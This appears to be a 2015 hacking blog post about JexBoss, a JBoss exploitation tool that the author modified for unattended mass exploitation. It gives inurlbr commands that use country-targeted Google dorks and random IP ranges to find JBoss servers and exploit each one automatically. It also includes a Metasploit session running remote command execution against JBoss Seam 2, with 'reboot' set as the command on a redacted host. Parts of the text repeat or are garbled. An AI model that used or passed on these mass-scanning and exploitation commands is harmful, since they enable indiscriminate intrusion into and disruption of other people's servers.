Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador JBoss. Mostrar todas as postagens
Mostrando postagens com marcador JBoss. Mostrar todas as postagens

sexta-feira, 19 de junho de 2015

JexBoss - Jboss Verify Tool - INURLBR Mass exploitation -

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner  All latches and test questions were withdrawn in order to be used in mass was added fução to save vulnerable sites.

Python <= 2.7.x

To install the latest version of JexBoss, please use the following commands:

git clone
cd jexboss

#  [ + ] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
#  [ + ] Updates:
#  [ + ] SCRIPT original: -
#  [ + ] Free for distribution and modification, but the authorship should be preserved.

The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.

The exploitation vectors are:

  1. /jmx-console - tested and working in JBoss versions 4, 5 and 6
  2. /web-console/Invoker- tested and working in JBoss versions 4
  3. /invoker/JMXInvokerServlet- tested and working in JBoss versions 4 and 5

The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner 
All latches and test questions were withdrawn in order to be used in mass was added function to save vulnerable sites.

Mass Exploration: 
To do this we use the scanner inurlbr
Modified script for mass exploitation: 



- single search.
--dork {YOU_DORK}

php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all  --unique --command-all "python  _TARGET_"

- search using dorks file 
- File example with dorks:
site:br inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"
site:in inurl:"jmx-console/HtmlAdaptor"
site:ru inurl:"jmx-console/HtmlAdaptor"
site:pe inurl:"jmx-console/HtmlAdaptor"
site:br  inurl:"/web-console/Invoker"
site:uk  inurl:"/web-console/Invoker"
site:ru  inurl:"/web-console/Invoker"
site:us  inurl:"/web-console/Invoker"
site:com  inurl:"/web-console/Invoker"
So on .....

Exemple-> File: dorks.txt
--dork-file {YOU_DORKFILE}
php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all  --unique --command-all "python  _TARGET_"

- Using to capture the range of ips--range {IP_START,IP_END}

php inurlbr.php --range ',' -s output.txt -q all  --unique --command-all "python  _TARGET_"
- Range of ips random--range-rand {counter}

php inurlbr.php --range-rand '150' -s output.txt -q all  --unique --command-all "python  _TARGET_"

Exemple OUTPUT:

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 Remote Command Execution - Metasploit

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
  • MODULE METASPLOIT:auxiliary/admin/http/jboss_seam_exec
  • COMMAND SCANNER INURLBR:/inurlbr.php --dork ' inurl:.seam' -s jboss.txt -q 1,6
  • inurl:.seam  intitle:"JBoss Seam Debug"
  • CMD  - The command to execute.
  • RHOST - The target address
  • RPORT  - The target port
  • TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit

msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST ******* msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI  /******/home.seam msf auxiliary(jboss_seam_exec) > exploit

